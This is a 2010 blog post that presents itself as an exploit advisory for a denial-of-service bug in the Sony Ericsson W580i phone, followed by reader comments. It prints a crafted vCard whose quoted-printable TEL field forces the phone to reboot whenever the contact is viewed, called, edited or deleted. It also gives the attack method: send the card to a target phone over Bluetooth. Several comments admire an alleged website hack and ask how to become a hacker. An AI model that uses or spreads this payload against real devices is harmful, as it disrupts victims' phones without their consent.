DoS: Sony Ericsson Phone memory Contact.
SharePen-tested Subject: Sony Ericsson Phone Contact.
Discovery Date: 19/03/2010.
Exploit Date: 10/04/2010.
Test Object: Sony Ericsson W580i.
Used Tools: BlueTooth, MyPhoneExplorer and Textpad.
Vulnerability: Denial of Service.
Result : Automatic Force Reboot.
Greetings : FaceBook!! Yaa FaceBook!!
Note: None.
0×01: Introduction:
My younger brother suddenly informed me that, his phone got a problem. It takes Reboot when he wants to call a contact. He also said: “I was working with Digital V-Cardsâ€.
0×02: Description:
**Normal V-Card that saves at SE phone contact.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8:;Unknown FN;CHARSET=UTF-8:Unknown TEL;CELL:+8801111112222 X-IRMC-LUID:00020000009A END:VCARD
Take a close look at V-Card, there is a character set encoding system (UTF-8) at N (Name) and FN (Family Name).
Why that character encoding used there? Cause SE supports many types of special symbols to write contact name on phone memory. Also it is a multilingual handset.
UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. It is able to represent any character in the Unicode standard, yet is backwards compatible with ASCII. For these reasons, it is steadily becoming the preferred encoding for e-mail, web pages, and other places where characters are stored or streamed.
UTF-8 encodes each character (code point) in 1 to 4 octets (8-bit bytes), with the single–octet encoding used only for the 128 US-ASCII characters.
0×03 Ideas:
1. Let use some special symbols in Contact name (V-Card).
2. Why not, we can set encoded data in CELL number (V-Card).
3. Hopefully SE developers never thought that user can set their V-Card Manually. And hopefully their decoding mechanism does not prepare to decode the CELL numbers.
0×04: Ideas execution:
Let see another V-Card that uses special symbols.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Unknown...=C2=A3 FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown...=C2=A3 TEL;CELL: +8801111112222 X-IRMC-LUID:000200000001 END:VCARD
It works perfectly.
0×05: Exploit:
Successfully exploited V-Card.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:V=01;Unknown FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown V=01 TEL;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:0000000000000000000000000000000= 0000000000000000000000000000000000000000000000000=EB=BA=BA X-IRMC-LUID:00020000001F END:VCARD
0×06: Attack Method:
1. Save this exploited V-Card.
2. Send this V-Card to targeted phone via Bluetooth from your computer or phone.
0×07: Effect:
Phone will take force reboot if victim want to DELETE, EDIT, CALL and VIEW that V-Card.
0×08: References:
1. The WiKipedia
2. SE Manual.
0×09: Credits:
a. Shakil Mirza.
b. Shahee Mirza.
0×10: Conclusion:
I think there is a vulnerability on Sony Ericsson handset’s Bluetooth. Multi-request and too much DATA flow may causes DoS.
You can follow any responses to this entry through the RSS feed. You can leave a response, or trackback from your own site.
Tagged DoS, Sony Ericsson, vulnerabilty
TareqJune 6, 2010 at 5:48 pm
Lolz, thats kinda funny thing
Shahee MirzaJune 6, 2010 at 6:13 pmAuthor
Funny !!!!!!! :s
jobbarJuly 20, 2010 at 11:33 am
Bujhlamna !!!
SakilAugust 10, 2010 at 5:09 pm
Vai,jei ghotona ghotaisilen Rab er website hack koira,rab onek lojja paisilo !!! i am your new fan. Apnake hack kora jabe kivabe ???
AsaduzzamanNovember 8, 2010 at 8:30 pm
Ami Apnetee mugdho. But chup chap thakte chai na. Kobe je sofol hacker hobo……